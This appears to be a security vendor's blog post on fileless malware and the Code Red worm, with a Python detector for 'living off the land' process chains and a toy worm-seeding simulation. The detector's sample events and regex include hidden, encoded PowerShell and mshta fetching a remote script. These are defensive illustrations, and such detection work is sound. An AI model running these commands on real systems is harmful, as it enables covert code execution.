Fileless malware variants are like ghosts: Many stories surround them, but they rarely reveal themselves on demand, even to trained hunters. Fileless infections instead seem to appear, suddenly and without warning, when we least expect them. Discovery is often by accident or coincidence.
Yet the specter of fileless malware is a growing concern because confirmed sightings appear to be increasing. For instance, in February, security researchers discovered fileless malware on the networks of 140 banks across 40 countries. Although industry-wide statistics on fileless infections can be hard to come by, cursory clues, such as Google searches, indicate a growing number of online investigations since 2015.
Fileless malware is spooky, in part, because it doesn’t behave like traditional file-based malware, which contains a signature that anti-virus products can use for future detection. File-based malware is usually detectable using traditional computer forensic tools.
In contrast, fileless malware resides in its host’s random access memory (RAM), which means it leaves no trace of itself on hard disk drives. When an infected host is powered down, the fileless malware disappears like an apparition, leaving no forensic clues on disk.
But fileless malware often has additional capabilities that help it remain elusive. For instance, it frequently haunts hosts by turning their own system and administrative tools against them, a tactic that security researchers call “living off the land.” While this produces ghost-in-the-machine behavior, fileless malware does not necessarily introduce anything observably unusual into the environment, which makes detection more difficult.
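Because “living off the land” reuses tools that are legitimately present, the detection opportunity lies in context rather than in any file: which process launched the tool, and with what arguments. The following is an added example, not code from the original post or from BluVector; the process-creation log format, the tool and parent lists, and the argument patterns are all assumptions chosen for illustration, and the sample events are constructed.

```python
"""Flag 'living off the land' process chains in constructed process-creation events.

An alert fires when a built-in scripting/administration tool is spawned by an
application that normally has no reason to launch it (e.g. a word processor), or
when the tool is started with arguments typical of evasion (hidden window,
encoded command). Log format, tool lists and patterns are assumptions for this
example, not taken from the article.
"""
import re
from typing import Dict, List

# Built-in tools commonly reused by fileless malware (assumed list).
ADMIN_TOOLS = {
    "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "regsvr32.exe", "rundll32.exe", "wmic.exe", "certutil.exe",
}

# Parents that should not normally spawn an admin tool (assumed list).
UNEXPECTED_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "chrome.exe", "firefox.exe", "iexplore.exe", "acrord32.exe",
}

# Argument patterns associated with evasive interpreter use (assumed).
SUSPICIOUS_ARGS = re.compile(
    r"(?i)-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|downloadstring|\biex\b"
)

# Constructed process-creation events in an assumed key=value format.
SAMPLE_EVENTS = [
    '2017-09-01T10:02:11Z host=ws12 parent=explorer.exe image=powershell.exe '
    'cmd="powershell.exe -File C:\\scripts\\inventory.ps1"',
    '2017-09-01T10:05:43Z host=ws12 parent=winword.exe image=powershell.exe '
    'cmd="powershell.exe -w hidden -enc <placeholder>"',
    '2017-09-01T10:06:02Z host=ws07 parent=services.exe image=svchost.exe '
    'cmd="svchost.exe -k netsvcs"',
    '2017-09-01T10:09:30Z host=ws07 parent=chrome.exe image=mshta.exe '
    'cmd="mshta.exe http://example.invalid/x.hta"',
]

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) '
    r'image=(?P<image>\S+) cmd="(?P<cmd>.*)"$'
)


def parse_event(line: str) -> Dict[str, str]:
    """Parse one event line into a dict; raise on lines that do not match."""
    match = EVENT_RE.match(line)
    if not match:
        raise ValueError(f"unparseable event: {line!r}")
    return match.groupdict()


def score_event(event: Dict[str, str]) -> List[str]:
    """Return the list of reasons an event looks like living-off-the-land abuse."""
    image = event["image"].lower()
    parent = event["parent"].lower()
    reasons: List[str] = []
    if image not in ADMIN_TOOLS:
        return reasons  # not a tool we care about; legitimate admin use is common
    if parent in UNEXPECTED_PARENTS:
        reasons.append(f"{image} spawned by {parent}")
    if SUSPICIOUS_ARGS.search(event["cmd"]):
        reasons.append("evasive interpreter arguments")
    return reasons


def analyze(lines: List[str]) -> List[Dict[str, object]]:
    """Run the scoring over a batch of event lines and return the alerts."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        event = parse_event(line)
        reasons = score_event(event)
        if reasons:
            alerts.append({
                "ts": event["ts"], "host": event["host"],
                "image": event["image"], "parent": event["parent"],
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(f'{alert["ts"]} {alert["host"]}: {alert["image"]} <- {alert["parent"]}')
        for reason in alert["reasons"]:
            print(f"    - {reason}")
```

The first event (an inventory script launched from the desktop shell) produces no alert, which is the point: the tool itself is not the signal, its parent and arguments are. Real deployments would draw the parent/child data from an endpoint sensor or Windows process-creation auditing and tune the lists to the environment.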
Fileless Malware Ghosts of Times Past
Just as the concept of ghosts long outlasts specific stories, which tend to morph over time and be historically and culturally situated, the concept of fileless malware is nothing new. It dates to the 1990s and the dawn of the World Wide Web, but the specifics of recent accounts have changed in key ways from historical manifestations.
Fileless malware did not gain widespread attention until researchers discovered its role in one of the most infamous global cyberattacks in history.
On July 12, 2001, still-unknown hackers introduced a computer worm into the wild. The first version of the worm exploited a buffer overflow vulnerability in Microsoft IIS servers and then used a static seed to self-propagate. The static seed caused the first version to spread slowly and resulted in minor damage (primarily a defacing message that read, “Hacked by Chinese”). But, on July 15, two researchers at eEye Digital Security spotted the worm’s activities in security logs and began investigating.
Seven days later, on July 19, the anonymous hackers released a second variant into the wild. This second variant contained a single difference from the first: the use of a random seed rather than a static seed to spread.
This second version infected 359,000 machines in 14 hours. (By comparison, the WannaCry ransomware outbreak in May infected approximately 250,000 devices in 150 countries in several hours.)
And that’s how the “memory-resident” CodeRed worm – so named because the researchers who discovered it drank Code Red Mountain Dew while reverse engineering it – made fileless malware history.
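Why did swapping a static seed for a random one make such a difference? With a static seed, every infected host derives the same list of targets from its random number generator, so the worm keeps re-probing the same addresses; with per-host random seeds, each new infection probes a fresh slice of the address space. The toy simulation below is an added example, not code from the original post or a reconstruction of Code Red itself: the address space size, probes per host, vulnerable fraction and the constant used as the “static seed” are all assumptions, and the model ignores timing, network effects and hosts going offline.

```python
"""Toy model of worm propagation with a static vs. a random PRNG seed.

This is an illustration of the seeding point only, not a model of Code Red.
All parameters below are assumptions chosen to keep the simulation fast.
"""
import random

ADDRESS_SPACE = 100_000      # toy number of addresses (assumption)
PROBES_PER_HOST = 50         # targets each infected host probes per round (assumption)
VULNERABLE_FRACTION = 0.05   # share of addresses that are exploitable (assumption)
STATIC_SEED = 12345          # the "static seed" every host would share (assumption)


def targets_for(seed: int, probes: int = PROBES_PER_HOST, space: int = ADDRESS_SPACE) -> list:
    """Target list a host derives from its PRNG seed (same seed -> same list)."""
    rng = random.Random(seed)
    return [rng.randrange(space) for _ in range(probes)]


def unique_targets_probed(static_seed: bool, n_hosts: int, sim_seed: int = 1) -> int:
    """Count distinct addresses probed by n_hosts hosts in one round."""
    meta = random.Random(sim_seed)
    probed = set()
    for _ in range(n_hosts):
        seed = STATIC_SEED if static_seed else meta.getrandbits(32)
        probed.update(targets_for(seed))
    return len(probed)


def simulate(static_seed: bool, rounds: int, sim_seed: int = 1) -> int:
    """Return the number of infected hosts after `rounds` propagation rounds."""
    meta = random.Random(sim_seed)
    vulnerable = set(meta.sample(range(ADDRESS_SPACE), int(ADDRESS_SPACE * VULNERABLE_FRACTION)))
    infected = {min(vulnerable)}  # patient zero
    for _ in range(rounds):
        newly_infected = set()
        for _host in infected:
            # Static: every host reuses the same seed, hence the same target list.
            # Random: each host draws its own seed, hence its own target list.
            seed = STATIC_SEED if static_seed else meta.getrandbits(32)
            for target in targets_for(seed):
                if target in vulnerable and target not in infected:
                    newly_infected.add(target)
        infected |= newly_infected
    return len(infected)


if __name__ == "__main__":
    for label, static in (("static seed", True), ("random seed", False)):
        print(f"{label}: {unique_targets_probed(static, 100)} distinct targets from 100 hosts, "
              f"{simulate(static, rounds=8)} infected after 8 rounds")
```

With the static seed the infection stalls as soon as the handful of vulnerable hosts on the one shared target list are infected, regardless of how many rounds run; with random seeds the infected population grows geometrically until the vulnerable hosts are exhausted. The same reasoning is why defenders watching scan traffic saw the first variant as slow, repetitive probing and the second as a sudden flood.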
Today’s Fileless Malware Threat
Fileless malware is worth hunting today because of its growing prevalence combined with its often more sophisticated capabilities, which are far graver than silly defacements.
Many current fileless malware variants sport robust functionality for cyberespionage and advanced multi-stage attacks, including the ability to establish persistent backdoors, exfiltrate data, and connect to remote command & control servers for further instructions and additional payloads.
Given the difficulty of detecting fileless malware, BluVector is preparing a new feature to help combat fileless malware at the network edge. The use of this new technology will allow BluVector customers to find fileless malware traversing the network. We invite you to contact us in the meantime to discuss how we can protect your environment from the uncanny threat of fileless malware by putting BluVector to the test.